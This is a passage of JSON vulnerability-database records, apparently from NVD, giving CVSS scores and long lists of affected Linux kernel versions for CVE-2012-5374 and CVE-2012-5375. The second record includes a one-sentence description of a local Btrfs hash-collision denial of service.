{"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5374"], "modified": "2014-01-04T04:42:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2012-5374", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5374", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:56", "description": "The CRC32C feature in the Btrfs implementation in the Linux kernel before 3.8-rc1 allows local users to cause a denial of service (prevention of file creation) by leveraging the ability to write to a directory important to the victim, and creating a file with a crafted name that is associated with a specific CRC32C hash value.", "edition": 6, "cvss3": {}, "published": "2013-02-18T11:56:00", "title": "CVE-2012-5375", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5375"], "modified": "2014-01-04T04:42:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.8", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2012-5375", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5375", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", 